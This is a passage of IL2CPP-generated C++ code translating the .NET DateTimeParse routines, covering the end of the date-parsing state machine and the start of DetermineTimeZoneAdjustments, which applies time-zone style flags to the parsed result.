L_5 = (int8_t*) alloca((((uintptr_t)((int32_t)12)))); memset(L_5,0,(((uintptr_t)((int32_t)12)))); V_7 = (int32_t*)(L_5); int32_t* L_6 = V_7; DateTimeRawInfo_Init_m24B8BAAD8B05676BEA0A3BBBE97279EFECA8FACD((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)(&V_4), (int32_t*)(int32_t*)L_6, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_7 = ___dtfi1; String_t* L_8 = DateTimeFormatInfo_get_DateSeparator_m68C0C4E4320F22BAA7B6E6EFF7DD7349541D509C(L_7, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_9 = ___dtfi1; String_t* L_10 = DateTimeFormatInfo_get_TimeSeparator_m9D230E9D88CE3E2EBA24365775D2B4B2D5621C58(L_9, /*hidden argument*/NULL); bool L_11 = String_Equals_mB42D01789A129C548840C18E9065ACF9412F1F84(L_8, L_10, 4, /*hidden argument*/NULL); (&V_4)->set_hasSameDateAndTimeSeparators_8(L_11); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_13 = ___dtfi1; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_14 = DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862(L_13, /*hidden argument*/NULL); L_12->set_calendar_10(L_14); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_15 = ___result3; L_15->set_era_7(0); String_t* L_16 = ___s0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_17 = ___dtfi1; __DTString__ctor_mE5FC300B73DE2B23E51414546030AF8625D1109E((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_5), L_16, L_17, /*hidden argument*/NULL); __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_5), /*hidden argument*/NULL); } IL_009b: { int32_t L_18 = V_1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_19 = ___result3; int32_t L_20 = ___styles2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_21 = DateTimeParse_Lex_mE8D565FF95FF14B4575857D9DF4056AC92AB4622(L_18, (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_5), (DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 *)(&V_3), (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)(&V_4), (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_19, (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)(&___dtfi1), L_20, /*hidden argument*/NULL); if (L_21) { goto IL_00af; } } { return (bool)0; } IL_00af: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_22 = V_3; int32_t L_23 = L_22.get_dtt_0(); if ((((int32_t)L_23) == ((int32_t)((int32_t)18)))) { goto IL_023c; } } { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_24 = V_3; int32_t L_25 = L_24.get_suffix_1(); if ((((int32_t)L_25) == ((int32_t)((int32_t)256)))) { goto IL_00f0; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_26 = ___result3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_27 = DateTimeParse_ProcessDateTimeSuffix_m78BC07D99DB12539C79C1238D753A0FCC1B73CF3((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_26, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)(&V_4), (DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 *)(&V_3), /*hidden argument*/NULL); if (L_27) { goto IL_00e4; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_28 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_28, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_00e4: { (&V_3)->set_suffix_1(((int32_t)256)); } IL_00f0: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_29 = V_3; int32_t L_30 = L_29.get_dtt_0(); if ((!(((uint32_t)L_30) == ((uint32_t)((int32_t)19))))) { goto IL_011f; } } { int32_t L_31 = V_1; if ((((int32_t)L_31) == ((int32_t)((int32_t)13)))) { goto IL_0104; } } { int32_t L_32 = V_1; if ((!(((uint32_t)L_32) == ((uint32_t)((int32_t)12))))) { goto IL_0110; } } IL_0104: { int32_t L_33 = ___styles2; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_34 = ___result3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_35 = DateTimeParse_ParseISO8601_mC6C5A03B75BD943D6CC59E696B0AC2641E1C0C96((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)(&V_4), (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_5), L_33, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_34, /*hidden argument*/NULL); return L_35; } IL_0110: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_36 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_36, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_011f: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E L_37 = V_4; bool L_38 = L_37.get_hasSameDateAndTimeSeparators_8(); if (!L_38) { goto IL_01e6; } } { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_39 = V_3; int32_t L_40 = L_39.get_dtt_0(); if ((((int32_t)L_40) == ((int32_t)((int32_t)14)))) { goto IL_0149; } } { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_41 = V_3; int32_t L_42 = L_41.get_dtt_0(); if ((((int32_t)L_42) == ((int32_t)((int32_t)12)))) { goto IL_0149; } } { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_43 = V_3; int32_t L_44 = L_43.get_dtt_0(); if ((!(((uint32_t)L_44) == ((uint32_t)((int32_t)13))))) { goto IL_0157; } } IL_0149: { int32_t L_45 = V_1; if ((!(((uint32_t)L_45) == ((uint32_t)((int32_t)18))))) { goto IL_0150; } } { V_1 = 3; } IL_0150: { int32_t L_46 = V_1; if ((!(((uint32_t)L_46) == ((uint32_t)((int32_t)19))))) { goto IL_0157; } } { V_1 = 5; } IL_0157: { bool L_47 = __DTString_AtEnd_mE89AB87FFD62B3BA1D1E5B30052947890000EADC((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_5), /*hidden argument*/NULL); V_8 = L_47; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_48 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_49 = V_1; int32_t L_50 = L_49; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_51 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_48)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_50)); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_52 = V_3; int32_t L_53 = L_52.get_dtt_0(); int32_t L_54 = L_53; int32_t L_55 = (int32_t)(L_51)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_54)); bool L_56 = V_8; if (!((int32_t)((int32_t)((((int32_t)L_55) == ((int32_t)((int32_t)20)))? 1 : 0)|(int32_t)L_56))) { goto IL_01e6; } } { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_57 = V_3; int32_t L_58 = L_57.get_dtt_0(); V_9 = L_58; int32_t L_59 = V_9; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_59, (int32_t)4))) { case 0: { goto IL_01b5; } case 1: { goto IL_01c6; } case 2: { goto IL_01e6; } case 3: { goto IL_01e6; } case 4: { goto IL_01d7; } } } { int32_t L_60 = V_9; if ((!(((uint32_t)L_60) == ((uint32_t)((int32_t)13))))) { goto IL_01e6; } } { bool L_61 = V_8; G_B29_0 = (&V_3); if (L_61) { G_B30_0 = (&V_3); goto IL_01ac; } } { G_B31_0 = ((int32_t)12); G_B31_1 = G_B29_0; goto IL_01ae; } IL_01ac: { G_B31_0 = ((int32_t)14); G_B31_1 = G_B30_0; } IL_01ae: { G_B31_1->set_dtt_0(G_B31_0); goto IL_01e6; } IL_01b5: { bool L_62 = V_8; G_B33_0 = (&V_3); if (L_62) { G_B34_0 = (&V_3); goto IL_01be; } } { G_B35_0 = 3; G_B35_1 = G_B33_0; goto IL_01bf; } IL_01be: { G_B35_0 = 1; G_B35_1 = G_B34_0; } IL_01bf: { G_B35_1->set_dtt_0(G_B35_0); goto IL_01e6; } IL_01c6: { bool L_63 = V_8; G_B37_0 = (&V_3); if (L_63) { G_B38_0 = (&V_3); goto IL_01cf; } } { G_B39_0 = 3; G_B39_1 = G_B37_0; goto IL_01d0; } IL_01cf: { G_B39_0 = 1; G_B39_1 = G_B38_0; } IL_01d0: { G_B39_1->set_dtt_0(G_B39_0); goto IL_01e6; } IL_01d7: { bool L_64 = V_8; G_B41_0 = (&V_3); if (L_64) { G_B42_0 = (&V_3); goto IL_01e0; } } { G_B43_0 = 7; G_B43_1 = G_B41_0; goto IL_01e1; } IL_01e0: { G_B43_0 = 6; G_B43_1 = G_B42_0; } IL_01e1: { G_B43_1->set_dtt_0(G_B43_0); } IL_01e6: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_65 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_66 = V_1; int32_t L_67 = L_66; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_68 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_65)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_67)); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_69 = V_3; int32_t L_70 = L_69.get_dtt_0(); int32_t L_71 = L_70; int32_t L_72 = (int32_t)(L_68)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_71)); V_1 = L_72; int32_t L_73 = V_1; if ((!(((uint32_t)L_73) == ((uint32_t)((int32_t)20))))) { goto IL_0209; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_74 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_74, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0209: { int32_t L_75 = V_1; if ((((int32_t)L_75) <= ((int32_t)((int32_t)20)))) { goto IL_023c; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_76 = ___dtfi1; int32_t L_77 = DateTimeFormatInfo_get_FormatFlags_m42B106A8C2AC470D425032034608045AABB71731(L_76, /*hidden argument*/NULL); if (!((int32_t)((int32_t)L_77&(int32_t)8))) { goto IL_0228; } } { int32_t L_78 = V_1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_79 = ___result3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_80 = ___dtfi1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_81 = DateTimeParse_ProcessHebrewTerminalState_m1D9D4E8A87FFACE53E9313F6A469620E24FA573D(L_78, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_79, (int32_t*)(&___styles2), (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)(&V_4), L_80, /*hidden argument*/NULL); if (L_81) { goto IL_0238; } } { return (bool)0; } IL_0228: { int32_t L_82 = V_1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_83 = ___result3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_84 = ___dtfi1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_85 = DateTimeParse_ProcessTerminaltState_mDEE6B5911737D96C89B9AA5749F4A8CB86EA838D(L_82, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_83, (int32_t*)(&___styles2), (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)(&V_4), L_84, /*hidden argument*/NULL); if (L_85) { goto IL_0238; } } { return (bool)0; } IL_0238: { V_2 = (bool)1; V_1 = 0; } IL_023c: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_86 = V_3; int32_t L_87 = L_86.get_dtt_0(); if (!L_87) { goto IL_0259; } } { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_88 = V_3; int32_t L_89 = L_88.get_dtt_0(); if ((((int32_t)L_89) == ((int32_t)1))) { goto IL_0259; } } { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 L_90 = V_3; int32_t L_91 = L_90.get_dtt_0(); if ((!(((uint32_t)L_91) == ((uint32_t)6)))) { goto IL_009b; } } IL_0259: { bool L_92 = V_2; if (L_92) { goto IL_026b; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_93 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_93, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_026b: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_94 = ___dtfi1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DateTimeParse_AdjustTimeMark_mB9686C681235D376DDE453471FFCC72C9B7DDC6E(L_94, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)(&V_4), /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_95 = ___result3; int32_t* L_96 = L_95->get_address_of_Hour_3(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E L_97 = V_4; int32_t L_98 = L_97.get_timeMark_6(); bool L_99 = DateTimeParse_AdjustHour_mB41992E26807EE20E333ABBCD87EAA1F69024C56((int32_t*)L_96, L_98, /*hidden argument*/NULL); if (L_99) { goto IL_0296; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_100 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_100, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0296: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_101 = ___result3; int32_t L_102 = L_101->get_Year_0(); if ((!(((uint32_t)L_102) == ((uint32_t)(-1))))) { goto IL_02b3; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_103 = ___result3; int32_t L_104 = L_103->get_Month_1(); if ((!(((uint32_t)L_104) == ((uint32_t)(-1))))) { goto IL_02b3; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_105 = ___result3; int32_t L_106 = L_105->get_Day_2(); G_B64_0 = ((((int32_t)L_106) == ((int32_t)(-1)))? 1 : 0); goto IL_02b4; } IL_02b3: { G_B64_0 = 0; } IL_02b4: { V_6 = (bool)G_B64_0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_107 = ___result3; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_108 = ___result3; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** L_109 = L_108->get_address_of_calendar_10(); int32_t L_110 = ___styles2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_111 = DateTimeParse_CheckDefaultDateTime_mE0B8DBAE34A78D6A4E4B7FA6660929CA67EB3478((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_107, (Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 **)L_109, L_110, /*hidden argument*/NULL); if (L_111) { goto IL_02c7; } } { return (bool)0; } IL_02c7: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_112 = ___result3; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_113 = L_112->get_calendar_10(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_114 = ___result3; int32_t L_115 = L_114->get_Year_0(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_116 = ___result3; int32_t L_117 = L_116->get_Month_1(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_118 = ___result3; int32_t L_119 = L_118->get_Day_2(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_120 = ___result3; int32_t L_121 = L_120->get_Hour_3(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_122 = ___result3; int32_t L_123 = L_122->get_Minute_4(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_124 = ___result3; int32_t L_125 = L_124->get_Second_5(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_126 = ___result3; int32_t L_127 = L_126->get_era_7(); bool L_128 = VirtFuncInvoker9< bool, int32_t, int32_t, int32_t, int32_t, int32_t, int32_t, int32_t, int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * >::Invoke(22 /* System.Boolean System.Globalization.Calendar::TryToDateTime(System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.DateTime&) */, L_113, L_115, L_117, L_119, L_121, L_123, L_125, 0, L_127, (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&V_0)); if (L_128) { goto IL_0310; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_129 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_129, 4, _stringLiteral3908AA3BFE204D9D04F695379736F7C93792A7E9, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0310: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E L_130 = V_4; double L_131 = L_130.get_fraction_7(); if ((!(((double)L_131) > ((double)(0.0))))) { goto IL_0341; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E L_132 = V_4; double L_133 = L_132.get_fraction_7(); IL2CPP_RUNTIME_CLASS_INIT(Math_tFB388E53C7FDC6FCCF9A19ABF5A4E521FBD52E19_il2cpp_TypeInfo_var); double L_134 = bankers_round(((double)il2cpp_codegen_multiply((double)L_133, (double)(10000000.0)))); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_135 = DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&V_0), (((int64_t)((int64_t)L_134))), /*hidden argument*/NULL); V_0 = L_135; } IL_0341: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E L_136 = V_4; int32_t L_137 = L_136.get_dayOfWeek_4(); if ((((int32_t)L_137) == ((int32_t)(-1)))) { goto IL_036f; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E L_138 = V_4; int32_t L_139 = L_138.get_dayOfWeek_4(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_140 = ___result3; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_141 = L_140->get_calendar_10(); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_142 = V_0; int32_t L_143 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(12 /* System.DayOfWeek System.Globalization.Calendar::GetDayOfWeek(System.DateTime) */, L_141, L_142); if ((((int32_t)L_139) == ((int32_t)L_143))) { goto IL_036f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_144 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_144, 2, _stringLiteralA2B7B795445D4C0C91BF05E16188082D950BF16F, NULL, /*hidden argument*/NULL); return (bool)0; } IL_036f: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_145 = ___result3; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_146 = V_0; L_145->set_parsedDate_11(L_146); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_147 = ___result3; int32_t L_148 = ___styles2; bool L_149 = V_6; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_150 = DateTimeParse_DetermineTimeZoneAdjustments_mE29DEB6454825DC2B53BB17FE5268DFC8BA007C6((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_147, L_148, L_149, /*hidden argument*/NULL); if (L_150) { goto IL_0383; } } { return (bool)0; } IL_0383: { return (bool)1; } } // System.Boolean System.DateTimeParse::DetermineTimeZoneAdjustments(System.DateTimeResult&,System.Globalization.DateTimeStyles,System.Boolean) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_DetermineTimeZoneAdjustments_mE29DEB6454825DC2B53BB17FE5268DFC8BA007C6 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___styles1, bool ___bTimeOnly2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_DetermineTimeZoneAdjustments_mE29DEB6454825DC2B53BB17FE5268DFC8BA007C6_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)2048)))) { goto IL_0016; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; int32_t L_3 = ___styles1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_4 = DateTimeParse_DateTimeOffsetTimeZonePostProcessing_m15829B176BF4A494CB94C200B51506EC9522DF80((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, L_3, /*hidden argument*/NULL); return L_4; } IL_0016: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_5 = ___result0; int32_t L_6 = L_5->get_flags_8(); if (((int32_t)((int32_t)L_6&(int32_t)((int32_t)256)))) { goto IL_00a8; } } { int32_t L_7 = ___styles1; if (!((int32_t)((int32_t)L_7&(int32_t)((int32_t)32)))) { goto IL_006a; } } { int32_t L_8 = ___styles1; if (!((int32_t)((int32_t)L_8&(int32_t)((int32_t)16)))) { goto IL_0056; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result0; int32_t* L_10 = L_9->get_address_of_flags_8(); int32_t* L_11 = L_10; int32_t L_12 = *((int32_t*)L_11); *((int32_t*)L_11) = (int32_t)((int32_t)((int32_t)L_12|(int32_t)((int32_t)256))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_13 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_14 = ___result0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_15 = L_14->get_parsedDate_11(); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_16 = TimeZoneInfo_GetLocalUtcOffset_m1C5E0CC7CA725508F5180BDBF2D03C3E8DF0FBFC(L_15, 2, /*hidden argument*/NULL); L_13->set_timeZoneOffset_9(L_16); goto IL_00a8; } IL_0056: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_17 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_18 = ___result0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_19 = L_18->get_parsedDate_11(); IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_20 = DateTime_SpecifyKind_m2E9B2B28CB3255EA842EBCBA42AF0565144D2316(L_19, 2, /*hidden argument*/NULL); L_17->set_parsedDate_11(L_20); return (bool)1; } IL_006a: { int32_t L_21 = ___styles1; if (!((int32_t)((int32_t)L_21&(int32_t)((int32_t)64)))) { goto IL_00a6; } } { int32_t L_22 = ___styles1; if (!((int32_t)((int32_t)L_22&(int32_t)((int32_t)16)))) { goto IL_008a; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_23 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_24 = ___result0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_25 = L_24->get_parsedDate_11(); IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_26 = DateTime_SpecifyKind_m2E9B2B28CB3255EA842EBCBA42AF0565144D2316(L_25, 1, /*hidden argument*/NULL); L_23->set_parsedDate_11(L_26); return (bool)1; } IL_008a: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_27 = ___result0; int32_t* L_28 = L_27->get_address_of_flags_8(); int32_t* L_29 = L_28; int32_t L_30 = *((int32_t*)L_29); *((int32_t*)L_29) = (int32_t)((int32_t)((int32_t)L_30|(int32_t)((int32_t)256))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_31 = ___result0; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_32 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); L_31->set_timeZoneOffset_9(L_32); goto IL_00a8; } IL_00a6: { return (bool)1; } IL_00a8: { int32_t L_33 = ___styles1; if (!((int32_t)((int32_t)L_33&(int32_t)((int32_t)128)))) { goto IL_00d3; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_34 = ___result0; int32_t L_35 = L_34->get_flags_8(); if 